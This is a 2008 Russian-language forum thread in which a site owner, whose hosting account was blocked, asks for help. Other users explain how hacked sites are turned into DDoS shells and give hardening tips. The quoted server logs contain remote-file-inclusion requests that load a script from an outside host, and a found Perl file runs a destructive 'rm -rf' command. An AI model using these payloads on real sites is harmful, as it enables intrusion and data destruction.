14.10.2008, 20:50 | #13 |
Специалист
Регистрация: 15.06.2007
Сообщений: 392
Вес репутации: 221
|
да и Joomla версии 1.0.15 не ломали, уязвимости были для версии 1.5.6
вот их ответы: Специалисты технической поддержки не занимаются редактированием и оптимизацией скриптов клиентов хостинга. Для Вас доступны множество программ способных выявить и устранить уязвимости в скриптах Ваших сайтов. Вчера все почистил (были проблемы, доступ от фтп увели, но я вообще всех фтп пользователей удалил, работал только через ssh)? проверял KIS-ом Доказательства: Вырезка из логов HTTP сервера: Not a JPEG file: starts with 0x47 0x49 Not a JPEG file: starts with 0x47 0x49 uptime: /var/run/utmp: No such file or directory uptime: /var/run/utmp: No such file or directory uptime: /var/run/utmp: No such file or directory uptime: /var/run/utmp: No such file or directory uptime: /var/run/utmp: No such file or directory uptime: /var/run/utmp: No such file or directory uptime: /var/run/utmp: No such file or directory uptime: /var/run/utmp: No such file or directory sysctl: not found sysctl: not found sysctl: not found sysctl: not found Not a JPEG file: starts with 0x47 0x49 Not a JPEG file: starts with 0x47 0x49 Not a JPEG file: starts with 0x47 0x49 Out of memory during "large" request for 33558528 bytes, total sbrk() is 185585664 bytes at b1tm.txt line 247. Файл: [sway@web08 ~]$ ls -la /tmp/ total 46 drwxrwxrwt 3 root wheel 512 Oct 14 18:35 . drwxr-xr-x 9 root wheel 512 Apr 5 2008 .. -rw-r--r-- 1 sway wheel 9268 Oct 14 03:05 cache_7b181b55b55aee36ad5e7bd9d5a091ec_1d11afb4b7f 1fcedc4a94a34be61bc09 -rw-r--r-- 1 sway wheel 11193 Oct 14 03:05 cache_7b181b55b55aee36ad5e7bd9d5a091ec_91820306da0 9e6338290ad963470979b -rw-r--r-- 1 sway wheel 12583 Oct 14 03:00 cache_7b181b55b55aee36ad5e7bd9d5a091ec_a16bd786796 43aa1cbff766eed8ed54a drwx------ 2 sway wheel 512 Oct 14 18:35 mc-sway -rw-r--r-- 1 sway wheel 52 Oct 14 14:30 rm.txt -rw------- 1 sway wheel 379 Oct 13 21:58 sess_450ae7291c42262cd5783d87bbdc8fc5 Файл удалениея вредосносного ПО был создан Oct 14 14:30 [sway@web08 ~]$ cat /tmp/rm.txt #!/usr/bin/perl exec("rm -rf *siti* && rm rm.txt"); Жалоба поступила нам Окт. 14 18:29:17 2008 : Hack Attempted to our domain www.microcyb.com from IP Address: 194.85.90.37 using host: sway.nichost.ru on 10-14-2008 10:14 am EDT. Hijacking injection script URL http://www.severo-zapad.ru//i/alb_id.txt? has been reported to the FBI Cyber Crime division. Date: 10-14-2008 Time: 10:14 am Time Zone: EDT Hack IP Address: 194.85.90.37 Port: 80 Hacking Using Host: sway.nichost.ru Hacking Script URL: http://www.severo-zapad.ru//i/alb_id.txt? Лог Вашего сайта: 194.85.90.37 - - [14/Oct/2008:17:20:03 +0400] "GET /kb/phpmanual/ref.yaz.htm/modules/newbb_plus/class/forumpollrenderer.php?bbPath%5bpath%5d=http://www.sever o-zapad.ru//i/alb_id.txt%3f HTTP/1.0" 200 597 "-" "libwww-perl/5.805" 194.85.90.37 - - [14/Oct/2008:17:20:04 +0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath%5bpath%5d=http://www.severo-zapad.ru//i/alb_id.txt% 3f HTTP/1.0" 200 572 "-" "libwww-perl/5.805" 194.85.90.37 - - [14/Oct/2008:17:20:04 +0400] "GET /kb/phpmanual/modules/newbb_plus/class/forumpollrenderer.php?bbPath%5bpath%5d=http://www.severo-zapad.ru// i/alb_id.txt%3f HTTP/1.0" 200 585 "-" "libwww-perl/5.805" 194.85.90.37 - - [14/Oct/2008:17:37:37 +0400] "GET /?bbPath%5bpath%5d=http://www.severo-zapad.ru//i/alb_id.txt%3f HTTP/1.0" 200 526 "-" "libwww-perl/5.805" 194.85.90.37 - - [14/Oct/2008:18:02:07 +0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath%5bpath%5d=http://www.severo-zapad.ru//i/alb_id.txt% 3f HTTP/1.0" 200 572 "-" "libwww-perl/5.805" 194.85.90.37 - - [14/Oct/2008:18:29:36 +0400] "GET /?bbPath%5bpath%5d=http://www.severo-zapad.ru//i/alb_id.txt%3f HTTP/1.0" 200 526 "-" "libwww-perl/5.805" 194.85.90.37 - - [14/Oct/2008:18:29:36 +0400] "GET /?bbPath%5bpath%5d=http://www.severo-zapad.ru//i/alb_id.txt%3f HTTP/1.0" 200 526 "-" "libwww-perl/5.805" Если эти действия были произведены вами то аккаунт хостинга разблокирован не будет, так как это серьезное нарушение регламента. Если это действие было произведено не Вами, то Вам необходимо было проверятиь Ваши скрипты на уязвимость, чтобы передупредить данную ситуацию. В данном случае Вами данное действие выполенно не было. Что повлеко вышеописанные последствия. Добавлено через 2 минуты увы, я в этом не силен, все что выше написано, для меня китайская грамота ((
__________________
Сделаю сайт на Joomla (в личку), хорошие, серьезные сайты. Последний раз редактировалось Sway; 14.10.2008 в 20:50. Причина: Добавлено сообщение |
14.10.2008, 22:46 | #14 | |
Специалист
Регистрация: 13.05.2008
Адрес: Urugway
Сообщений: 446
Вес репутации: 214
|
Цитата:
|
|
14.10.2008, 23:32 | #15 | |
Специалист
Регистрация: 25.09.2007
Сообщений: 361
Вес репутации: 217
|
Цитата:
Хостер не обязан копаться в скриптах юзера. В данном случае поимели именно через что-то у юзера, а не сервер хостера. Что подтверждают логи выше. Хостер же должен пресекать любые попытки делать гадости на своем оборудовании, что он и сделал. |
|
14.10.2008, 23:41 | #16 |
Новичок
Регистрация: 27.03.2007
Адрес: 6-ая палата
Сообщений: 3,438
Вес репутации: 409
|
http://www.severo-zapad.ru//i/alb_id.txt
У Вас есть такой файл на сервере? Через ftp проверьте. Пишут, что атакуют с помощью этого скрипта.
__________________
Готовые 100% уникальные тексты на разные темы. дешево |
15.10.2008, 00:25 | #17 |
Новичок
Регистрация: 08.05.2008
Сообщений: 58
Вес репутации: 201
|
обьясняю тему.
ломают сайт (двиг, трой, брут - не важно) заливают вебшел/скрипт ddos`а типа "смерч" далее когда набирается таких шеллов NN штук поднимают скрипт для управления "шеллами клиентами" появляется цель, отправляются запросы на "клиент шеллы" которые начинают доссить сайт жертву год или два назад был целый бум на подобные ддос системы и резкий демпинг цен в этой тематике. плюсы толстый канал от хостинга не шибко много затрат минусы непродолжительная жизнь - хостер блочит ак пользователя ----------- расшифрую на русский, что Вам написали. если Вы специально досите сайт - Вас заблочат перманентно если это ктото другой - позаботтесь о безопасности сайта сами, если повторится - расстрел через повешивание
__________________
|
15.10.2008, 00:48 | #18 | |
Вредина
Регистрация: 03.07.2007
Адрес: д.Коноплянка
Сообщений: 3,535
Вес репутации: 437
|
Если не юзаете FTP - закрывайте все порты файром кроме 80 и 25,110, 22 оставить только для себя.
Обратите внимание на запущенные шелы Цитата:
Смотрите логи сервера, смотрите не ломанули ли ssh, брутили ли и так далее. /var/log/security /var/log/auth.log Смотрите "sockstat -46", кто у вас висит особенно бурно, также его рубите файром. В общем вариантов тьма, без пациента диагноз поставить сложно , но для начала все закройте файрволом, дальше последовательно ищите подозрительные процессы. Ну и конечно переконфигурируйте php.ini отубайте системыне команды, типа system, socket, chmod, и т.д. Все файлы в /home/ рекурсивно в неисполняемые загоните, потом нужные поправите.
__________________
|
|
15.10.2008, 01:41 | #19 |
Мастер
Регистрация: 14.10.2007
Сообщений: 666
Вес репутации: 230
|
без рута ничего не сделаете ,
а с рутовыми правами ну как минимум - закройте исходящие от вашего апача наружу (выход на саповские ипишники оставьте чтоб ссылки могло забирать) закройте всем фитипи и шелл, по ip оставьте только себе. это на уровне пехи можно сделать - фильтраните запросы гетовские к проектам где в кверистринге встречается http ил ftp
__________________
работа в омске |
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Заблокировали акаунт для раздела Деловое сотрудничество | Maxon1981 | Курилка | 4 | 11.09.2008 12:48 |
Часовой пояс GMT +3, время: 07:49.